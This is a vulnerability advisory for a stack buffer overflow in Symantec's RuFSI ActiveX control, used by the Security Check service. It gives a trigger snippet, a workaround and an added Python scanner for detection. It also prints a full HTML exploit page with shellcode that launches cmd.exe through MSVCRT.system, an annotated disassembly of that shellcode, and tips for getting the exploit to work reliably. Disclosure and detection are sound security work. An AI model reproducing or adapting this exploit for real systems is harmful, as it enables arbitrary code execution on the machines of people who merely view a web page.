Symantec Security Check Service ActiveX Buffer Overflow

Summary

Symantec has a free online virus and security scanning service called Symantec Security Check.
To access this service, a user must go to http://www.symantec.com/securitycheck/ and then select what kind of scan they want to run. In order to run the scans, ActiveX controls are installed on the user's computer. The ActiveX control has been found to contain an exploitable buffer overflow.

Credit:

The information has been provided by Cesar; the exploit code was provided by SecurITeam Experts.


Details

One of the installed ActiveX controls is called 'Symantec RuFSI Utility Class' and carries the description 'Norton Internet Security Registry and File Information'. There is no documentation on what it does, but it appears to be used to collect information about the user's computer in order to perform the scans. If a long string is passed in any of the parameters of the CompareVersionStrings method, a stack-based overflow occurs when the method is executed.

To reproduce the overflow, just cut and paste the following:
<object classid='clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE' id='test'>
</object>

<script>
test.CompareVersionStrings('long string here', 'or long string here')
</script>

This ActiveX control is marked as safe, so the sample above runs without being blocked in the default Internet Explorer security configuration. This vulnerability can be exploited to run arbitrary code.
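From the defender's side, the two things a web proxy or page scanner can look for are the control being instantiated by its CLSID and CompareVersionStrings being called with an oversized string literal. The following Python scanner is an added example and not part of the original advisory; the 128-byte threshold and the two sample pages are assumptions, since the advisory only says "a long string" triggers the overflow.

```python
import re

# CLSID of the 'Symantec RuFSI Utility Class' control, taken from the advisory.
RUFSI_CLSID = "69DEAF94-AF66-11D3-BEC0-00105AA9B6AE"
# Assumed threshold: any string literal this long or longer in a call is flagged.
LONG_ARG = 128

# Matches <object ... classid='clsid:...'> (tolerating '< object' as in the
# advisory text) and captures the 36-character CLSID.
OBJECT_RE = re.compile(
    r"<\s*object\b[^>]*\bclassid\s*=\s*['\"]?clsid:([0-9A-Fa-f-]{36})", re.I)
# Matches a call to the vulnerable method and captures its argument list.
# Limitation: an argument containing ')' would cut the capture short.
CALL_RE = re.compile(r"\.CompareVersionStrings\s*\(([^)]*)\)", re.I | re.S)
# Matches single- or double-quoted string literals inside the argument list.
STR_RE = re.compile(r"(['\"])(.*?)\1", re.S)


def scan_html(html):
    """Return (kind, offset, detail) findings for the page."""
    findings = []
    for m in OBJECT_RE.finditer(html):
        if m.group(1).upper() == RUFSI_CLSID:
            findings.append(("object", m.start(), "instantiates Symantec RuFSI control"))
    for m in CALL_RE.finditer(html):
        lengths = [len(s) for _, s in STR_RE.findall(m.group(1))]
        if lengths and max(lengths) >= LONG_ARG:
            findings.append(("call", m.start(),
                             "CompareVersionStrings with %d-byte argument" % max(lengths)))
    return findings


def is_suspicious(html):
    """True only when the page both loads the control and feeds it a long string."""
    kinds = {kind for kind, _, _ in scan_html(html)}
    return "object" in kinds and "call" in kinds


# Constructed sample pages (not from the advisory): a normal-looking use of the
# control with short version strings, and the same page with an oversized argument.
SAMPLE_BENIGN = """<object classid='clsid:69deaf94-af66-11d3-bec0-00105aa9b6ae' id='chk'>
</object>
<script>chk.CompareVersionStrings('1.2.3', '1.2.4')</script>"""
SAMPLE_LONG = SAMPLE_BENIGN.replace("'1.2.3'", "'" + "A" * 300 + "'")

if __name__ == "__main__":
    for name, page in (("benign", SAMPLE_BENIGN), ("long", SAMPLE_LONG)):
        print(name, is_suspicious(page), scan_html(page))
```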

Workaround:
Go to %SystemRoot%\Downloaded Program Files and remove 'Symantec RuFSI Utility Class'.

Exploit code:
SecurITeam has built example exploit code that runs cmd.exe whenever the HTML below is viewed (note that it has been hard-coded to work with Windows 2000 and Internet Explorer 5.5):
<html>
<body>
<object classid='clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE' id='test'>
</object>

<script language='javascript'>
test.CompareVersionStrings('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB
CDE', 'Ì‹ìU‹ì3ÿWē ÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸Ã¯ xPEøPÿUô_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlÈ
')
</script>
</body>
</html>

<!-- \x90 - NOP
\xCC - INT3
\x90 - NOP
\x90 - NOP
\x90 - NOP
\x90 - NOP
\x8B\xEC - MOV EBP, ESP
\x55 - PUSH EBP
\x8B\xEC - MOV EBP, ESP
\x33\xFF - XOR EDI, EDI
\x57 - PUSH EDI
\x83\xEC\x04 - SUB ESP, 4
\xC6\x45\xF8\x63 - MOV BYTE PTR SS:[EBP-8],63h
\xC6\x45\xF9\x6D - MOV BYTE PTR SS:[EBP-7],6Dh
\xC6\x45\xFA\x64 - MOV BYTE PTR SS:[EBP-6],64h
\xC6\x45\xFB\x2E - MOV BYTE PTR SS:[EBP-5],2Eh
\xC6\x45\xFC\x65 - MOV BYTE PTR SS:[EBP-4],65h
\xC6\x45\xFD\x78 - MOV BYTE PTR SS:[EBP-3],78h
\xC6\x45\xFE\x65 - MOV BYTE PTR SS:[EBP-2],65h
\xB8\xC3\xAF\x01\x78 - MOV EAX, MSVCRT.system
\x50 - PUSH EAX
\x8D\x45\xF8 - LEA EAX, DWORD PTR SS:[EBP-8]
\x50 - PUSH EAX
\xFF\x55\xF4 - CALL DWORD PTR SS:[EBP-C]
\x5F - POP EDI
-->

Notes:
A few things to check if you can't get it to work:
1) Make sure MDM.exe (Machine Debug Manager) is not running, as it places the user buffer in places we didn't plan to jump to.
2) Make sure there is only ONE instance of iexplore.exe running, as each one has a different buffer area.

Categories: Windows